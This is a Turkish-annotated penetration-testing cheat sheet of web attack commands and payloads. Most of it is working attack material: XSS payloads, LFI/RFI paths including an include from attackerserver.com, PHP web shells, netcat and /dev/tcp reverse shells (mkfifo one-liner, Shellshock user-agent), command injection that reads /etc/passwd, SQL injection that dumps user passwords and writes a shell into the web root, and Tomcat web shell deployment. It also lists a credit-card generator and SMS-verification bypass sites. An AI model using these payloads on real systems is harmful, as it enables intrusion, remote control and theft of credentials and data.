HTTP Enumeration
----------------------------------------------
# Enum
gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
wfuzz -c -z file,users.txt -z file,pass.txt --sc 200 http://www.site.com/log.asp?user=FUZZ&pass=FUZ2Z
dirb <targetip>
dirbuster : İnteresting file scan
dmitry <targetadress>
theharvester -d microsoft.com -l 500 -b google -h myresults
sublist3r -d google.com
whatweb 
whois <adress>
--------------------------------------------
#Dirbuster
bak, backup, txt, copy, save, old, rar, zip, tar.gz, pdf
wordlist = /usr/share/dirbuster/directory-list-2.3-medium.txt
-------------------------------------------
# Online Enum
http://dnshistory.org/
https://subdomainfinder.c99.nl/
https://www.qualys.com/
https://jwt.io/
https://sitereport.netcraft.com/
https://www.pic2map.com
https://dnsdumpster.com/
https://haveibeenpwned.com/
https://www.kitterman.com/spf/validate.html
https://crt.sh/
https://www.shodan.io/
https://www.garykessler.net/library/file_sigs.html
https://public-dns.info/ -recursive dns tespiti için
https://aleph.occrp.org : Önemli belgeler
https://temp-mail.org/tr/?__cf_chl_jschl_tk__=pmd_8pYLCaNnrIg38hIFG_PQOjcVseWpzcmMEqpFzYthgFY-1631740059-0-gqNtZGzNAhCjcnBszQpl : geçici mail
https://www.businessyeti.com/Apps/CreditCardGenerator/
hunter.io/
https://receive-smss.com/ : sms doğrulamaları için site
https://malapi.io : malware için kullanılabilecek api'lar.
https://zoomeye.org
https://intelx.io : çalınmış veriler hakkında bilgilere ulaşır.
https://wigle.net
publicwww.com
viz.greynoise.io
pulsedive.com
reposify.com
--------------------------------------------

# nikto
nıkto -h <targetip>
skipsfish -o <kaydetmeadı> <websitesi>

----------------------------------------------

# Dns zone Enum
fierce -dns <adress>
dnsrecon <adress> 
----------------------------------------------
#xss
<script src="http://192.168.1.50:81/bad.js></script>
<script>window.onload = function () {var link=document.getElementById("link"); link.href="http://newssite.com";}</script> : dom xss için
<sCrIpt>alert("XsS")</scRiPt> : filtrelemeler için
"><sCrIpt>alert("XsS")</scRiPt> : php_self ile oluşturulmuş linkler için
<iMg SrC="x" oNeRRor="alert(1);"> : filtreleme için
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE : url ile encodelanarak
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<SVg/ONloAd = alert(1);>
";alert(2);//
';alert(1);//
---------------------------------------------
# curl
curl -v -X OPTIONS http://<targetip>/test/
curl --upload-file <file name> -v --url <url> -0 --http1.0
--------------------------------------------
# WEBDAV
davtest <ipadres>
# file upload basic 
curl -T 'm.txt' 'http://192.168.1.48/dav/hac.txt'
----------------------------------------------
# LFI
# PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
# Null Byte
?page=../../../../../../etc/passwd%00
----------------------------------------------

# RFI
/var/log/apache2/access.log - user - agent reverse shell
/var/log/nginx/access.log - user-agent reverse shell
/var/log/auth.log - ssh reverse shell
/proc/self/environ
/etc/httpd/logs/access.log
/etc/httpd/logs/error.log
?page=http://attackerserver.com/evil.txt
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.com/index.php?page=php://input?cmd=ls

#Critical file
config.php
db.php


----------------------------------------------
# Command Execution
<?php system('ls -la');?>
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip> 1234 >/tmp/f');?>
 mkdir m$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.15 8000 >/tmp/f)
---------------------------------------------

# LFI and RCE

# Inject code execution
<?php echo system($_REQUEST["cmd"]);?>

# Go to LFI vuln and
?=…….&cmd=ls

---------------------------------------------
#code injection

codeinjection :
";system("ls");$var="
${@system(ls)} //filter bypass

----------------------------------------------
#Os command injection
& whoami
&.& whoami
|| whoami
&cat</etc/passwd // küçüktür işareti boşluk yerine geçebilir.
|cat</etc/passwd
&cat$(IFS)/etc/passwd 
|cat$u/etc$u/passwd
www.google.com|w\ho\ami
|echo imaohw|rev| 2>&1 /bin/bash
&echo 'imaohw' | rev | base64 | base64 --decode | 2>&1 /bin/bash

----------------------------------------------
# SQL Injection (manual)
photoalbum.php?id=1'

# find the number of columns
photoalbum.php?id=1 order by 8

# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8

# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8

# Get version
?id=1 union select 1,2,3,4,version(),6,7,8

# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables

# Get all columns from a specific table
?id=1 union select 1,2,3, column_name ,5,6,7,8 from information_schema.columns where table_name=‘users’
?id=1 union select 1,2,3, group_concat(column_name) ,5,6,7,8 from information_schema.columns() where table_name=‘users’
.. 1,2,3, group_concat(user_id, 0x3a, first_name, 0x3a, last_name, 0x3a, email, 0x3a, pass, 0x3a, user_level) ,5,6,7,8 from users

# view files
' union select 1,2,3, load_file(‘/etc/passwd’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/login.php’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/includes/config.inc.php’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/mysqli_connect.php’) ,5,6,7,8 -- -	

# upload files
' union select 1,2,3, 'this is a test message' ,5,6,7,8 into outfile '/var/www/test'-- -	
' union select 1,2,3, load_file('/var/www/test') ,5,6,7,8 -- -	
' union select null,null,null, "<?php system($_GET['cmd']) ?>" ,5,6,7,8 into outfile '/var/www/shell.php' -- -	
' union select null,null,null, load_file('/var/www/shell.php') ,5,6,7,8 -- -

Evasion tecnniques
-1' or 1=1 -- +
  *-1' or 2>1-- +
-1' /*!12345order*/ by 7#

1' order by 8 -- +
   urlencoder : 1%27%20order%20by%208%20--%20%2B
   hex

----------------------------------------------

# wordpress
wpscan --url http://.... --log
wpscan --url http://... --enumerate u --log
wpscan --url http://<targetip> --wordlist wordlist.txt --username example_username
http://....../wp-admin
http://...../wp-content/uploads/2017/10/file.png
msfconsole : exploit/unix/webapp/wp_admin_shell_upload

----------------------------------------------
#Windows Command Execution (RFI exploit)

#Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) and send 
<?php echo shell_exec("nc.exe -nlvp 4444 -C:\Windows\System32\cmd.exe");?>
# on kali call the shell
nc -nv 10.11.25.59 4444

---------------------------------------------
#shellshock:
() { :; }; /bin/bash -c 'ping 3 192.168.1.52;nc 192.168.1.52 1234 -e /bin/sh'
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.1.57/cgi-bin/test.sh
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.90.35/9999 0>&1' http://192.168.90.59/cgi-bin/test.sh --> reverse shell

-------------------------------------------
msfconsole search phpmyadmin_login : phpmyadmin auxiliary brute force

------------------------------------------

# Tomcat

default port : 8080
web site : ip/manager/html (defaul username,password / tomcat-tomcat)
payload : /usr/share/webshells/laudanum/jsp/cmd.war - deploy payload
web site payload : <ip>/cmd/cmd.jsp
                    örnek: websitesi.com/cmd/cmd.jsp
msfconsole:                    
   scanner/http/tomcat_mgr_login : bruteforce
   exploit/multi/http/tomcat_mgr_upload       
   exploit/multi/http/tomcat_mgr_deploy
